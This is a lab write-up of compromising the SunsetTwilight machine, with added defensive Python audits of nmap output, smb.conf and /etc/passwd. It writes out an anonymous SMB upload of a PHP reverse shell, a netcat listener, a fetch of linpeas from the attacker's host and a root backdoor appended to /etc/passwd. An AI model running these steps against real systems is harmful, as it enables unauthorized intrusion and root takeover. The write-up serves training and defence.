# SunsetTwilight

## Nmap

```
sudo nmap 192.168.120.91 -p- -sS -sV

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp    open  smtp        Exim smtpd
80/tcp    open  http        Apache httpd 2.4.38 ((Debian))
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2121/tcp  open  ftp         pyftpdlib 1.5.6
3306/tcp  open  mysql       MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
8080/tcp  open  http        PHP cli server 5.5 or later
63525/tcp open  http        PHP cli server 5.5 or later
Service Info: Host: TWILIGHT; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
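The scan above is the whole basis for what follows, so it is worth seeing how a defender would consume the same output. The following Python script is an added example, not part of the original write-up: it parses the nmap port table into records and compares it against a hypothetical allow-list of the services this host is supposed to expose (SSH and HTTP only, an assumption for the example), flagging everything else. Run against the scan above it reports the extra Samba, FTP, MySQL and PHP CLI listeners.

```python
import re
from dataclasses import dataclass

# Port-table lines copied from the nmap scan above; the 'Service Info' line
# is kept to show that non-port lines are skipped by the parser.
NMAP_OUTPUT = """\
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp    open  smtp        Exim smtpd
80/tcp    open  http        Apache httpd 2.4.38 ((Debian))
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2121/tcp  open  ftp         pyftpdlib 1.5.6
3306/tcp  open  mysql       MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
8080/tcp  open  http        PHP cli server 5.5 or later
63525/tcp open  http        PHP cli server 5.5 or later
Service Info: Host: TWILIGHT; OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# Hypothetical allow-list of what this host should expose: port -> nmap
# service name. This is an assumption for the example, not something the
# write-up states about the target.
EXPECTED = {22: "ssh", 80: "http"}

# One nmap 'normal output' port line: "<port>/<proto>  <state>  <name>  <version>"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass(frozen=True)
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str


def parse_nmap_ports(text):
    """Parse nmap port-table lines into Service records (header and
    'Service Info' lines are ignored because they do not match PORT_LINE)."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        port, proto, state, name, version = m.groups()
        services.append(Service(int(port), proto, state, name, version.strip()))
    return services


def unexpected_services(services, expected=EXPECTED):
    """Return open services that are not in the allow-list, either because
    the port is unknown or because a different service answers on it."""
    return [s for s in services
            if s.state == "open" and expected.get(s.port) != s.name]


if __name__ == "__main__":
    for s in unexpected_services(parse_nmap_ports(NMAP_OUTPUT)):
        print(f"unexpected: {s.port}/{s.proto} {s.name} ({s.version})")
```

The comparison is by port *and* service name, so a known port answering with an unexpected service (for example a PHP CLI server on a port that should carry the Apache site) is still flagged.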

First up is checking SMB. We are able to connect and list shares without providing credentials, as shown below:

```
smbclient -U '' -L \\\\192.168.120.91\\
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-87c5029a294303fe6c7f0f140f467677f77e9879%2Fimage.png?alt=media)

We can then move into the WRKSHARE directory to view the contents:

```
smbclient -U '' \\\\192.168.120.91\\WRKSHARE\\
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8a4df94cdde6ba02141c83b437ad95771a802931%2Fimage.png?alt=media)

As it looks like the share exposes the entire filesystem from '/', we can have a look around for interesting information. We know that port 80 is open, so the target is likely running a web server.

Looking at the contents of the directory /var/www/html/, we can see PHP files.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ae5ef71a34d0e3b718d5dc8c061e5d289d32dd6d%2Fimage.png?alt=media)

If we can upload a PHP reverse shell, we should in theory be able to get shell access. I used the following `curl` command to upload a [PHP reverse shell](https://github.com/pentestmonkey/php-reverse-shell) into the /var/www/html directory:

```
curl --upload-file /home/kali/scripts/phpshell.php -u '' smb://192.168.120.91/WRKSHARE/var/www/html/phpshell.php
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-53a14892a42598338e64195c23b6e6c3296c9168%2Fimage.png?alt=media)

Checking the directory contents with `smbclient` again shows we have uploaded our PHP reverse shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-679bcf570e4629044cacabae7520a730993b676b%2Fimage.png?alt=media)
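Everything up to this point follows from one misconfiguration: a Samba share rooted at `/` that anonymous users can both read and write. The write-up never shows the target's `smb.conf`, so the following Python audit is an added example (not the project's or the author's code) run over a constructed configuration: the `WRKSHARE` section reproduces the risky pattern observed on the target, and `WRKSHARE-hardened` is the same share with a confined path, guest access off and writes disabled. The script parses the file and reports, per share, which of those conditions hold.

```python
# Constructed smb.conf excerpt for this example. It is an assumption for
# illustration, not the target's real configuration.
SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   map to guest = Bad User

# Risky: whole filesystem, anonymous, writable (the pattern seen on the target)
[WRKSHARE]
   path = /
   guest ok = yes
   read only = no

# Hardened: confined path, authenticated users only, read-only
[WRKSHARE-hardened]
   path = /srv/samba/wrkshare
   guest ok = no
   read only = yes
   valid users = @wrkshare
"""

# Samba accepts these spellings for a true boolean (case-insensitive).
TRUE_WORDS = {"yes", "true", "1"}


def parse_smb_conf(text):
    """Minimal smb.conf parser: {section: {lowercased key: value}}.
    Blank lines and '#'/';' comments are skipped; later keys overwrite earlier
    ones within a section, as Samba itself does."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def _flag(share, key, default):
    return share.get(key, default).strip().lower() in TRUE_WORDS


def audit_shares(conf_text):
    """Return {share_name: [findings]} for every non-global share."""
    findings = {}
    for name, share in parse_smb_conf(conf_text).items():
        if name.lower() in ("global", "printers", "print$"):
            continue
        problems = []
        if share.get("path", "").strip() == "/":
            problems.append("exports the root filesystem")
        # 'writable' / 'writeable' are synonyms for 'read only = no'
        writable = (_flag(share, "writable", "no")
                    or _flag(share, "writeable", "no")
                    or not _flag(share, "read only", "yes"))
        # 'public' is a synonym for 'guest ok'
        guest = _flag(share, "guest ok", "no") or _flag(share, "public", "no")
        if guest:
            problems.append("allows anonymous (guest) access")
        if guest and writable:
            problems.append("anonymous users can write")
        findings[name] = problems
    return findings


if __name__ == "__main__":
    for share, problems in audit_shares(SMB_CONF).items():
        print(share, "->", problems or "ok")
```

Pointing `audit_shares` at the contents of a real `/etc/samba/smb.conf` works the same way; the three findings it raises for `WRKSHARE` are exactly the three properties the write-up exploits (root path, anonymous access, write access).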

We can then set up a `netcat` listener and trigger the shell with `curl`.

```
sudo nc -lvp 80
curl http://192.168.120.91/phpshell.php
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d5ff860b805aa83eaf70406d40936f8062f85be1%2Fimage.png?alt=media)

The current shell can then be upgraded to an interactive one with:

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e868343388e7d9485f6029c7978a3cc23ad79b98%2Fimage.png?alt=media)

Next we can move into the /tmp/ directory. I started a Python `SimpleHTTPServer` on my attacking machine and transferred over `linpeas`.

```
wget http://192.168.49.120/linpeas.sh
```

`linpeas` picks up that /etc/passwd is writable by everyone, which means we can make changes to the file.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5587b54fd7c97347bc84a0d260863eee10fe57b5%2Fimage.png?alt=media)

As such, we can add a new user with UID 0 to the target machine to gain root access.

Generate a password hash on the attacking machine:

```
openssl passwd -1 -salt password password
```

Append the new user and password hash to the end of /etc/passwd on the target machine.

```
echo 'owned:$1$password$Da2mWXlxe6J7jtww12SNG/:0:0:owned:/root:/bin/bash' >> /etc/passwd
```

We can then use `su` to switch to the new account and gain a root shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e8ebe381d5bb88e4f8f6d3db10f7d17f11d6d6ce%2Fimage.png?alt=media)
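The privilege escalation above leaves two things a host check can catch: the file mode that made it possible, and the appended entry itself (a second UID 0 account whose password field carries a `$1$` MD5-crypt hash instead of the `x` that points at /etc/shadow). The following Python script is an added example, not part of the original write-up: it audits a passwd file's mode and entries, run here over a constructed Debian-style excerpt to which the `owned` line from the write-up has been appended. `audit_live` shows how the same function is applied to a real `/etc/passwd`.

```python
import os
import stat

# Constructed /etc/passwd excerpt: typical Debian entries, then the line
# appended in the write-up above.
BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
"""
OWNED_LINE = "owned:$1$password$Da2mWXlxe6J7jtww12SNG/:0:0:owned:/root:/bin/bash\n"
TAMPERED_PASSWD = BASELINE_PASSWD + OWNED_LINE

# Constructed st_mode values: the world-writable mode linpeas flagged on the
# target, and the Debian default for /etc/passwd.
WORLD_WRITABLE_MODE = 0o100666
DEFAULT_MODE = 0o100644

# Password fields that do not contain a usable hash.
SHADOWED = {"x"}
LOCKED = {"*", "!", "!!"}


def audit_passwd(text, mode):
    """Return a list of findings for a passwd file's contents and mode."""
    findings = []
    if mode & stat.S_IWOTH:
        findings.append("passwd is world-writable (mode %o)" % (mode & 0o777))
    elif mode & stat.S_IWGRP:
        findings.append("passwd is group-writable (mode %o)" % (mode & 0o777))

    seen = set()
    for n, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"line {n}: malformed entry ({len(fields)} fields)")
            continue
        user, pw, uid, gid, _gecos, _home, _shell = fields
        if user in seen:
            findings.append(f"line {n}: duplicate user '{user}'")
        seen.add(user)
        if pw == "":
            findings.append(f"line {n}: user '{user}' has an empty password field")
        elif pw not in SHADOWED | LOCKED:
            # A hash here bypasses /etc/shadow; '$1$' marks MD5-crypt.
            findings.append(f"line {n}: user '{user}' has a password hash "
                            f"in passwd (prefix {pw[:3]})")
        if uid == "0" and user != "root":
            findings.append(f"line {n}: user '{user}' has UID 0")
    return findings


def audit_live(path="/etc/passwd"):
    """Apply the same audit to a real file on the host running this script."""
    with open(path, encoding="utf-8") as fh:
        return audit_passwd(fh.read(), os.stat(path).st_mode)


if __name__ == "__main__":
    for finding in audit_passwd(TAMPERED_PASSWD, WORLD_WRITABLE_MODE):
        print(finding)
```

On the tampered sample the audit reports the world-writable mode, the hash stored in the password field, and the non-root UID 0 user; the baseline with the default mode produces no findings. Comparing the set of UID 0 users against a known-good list, or simply alerting on any change to the file, is the cheaper ongoing control.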
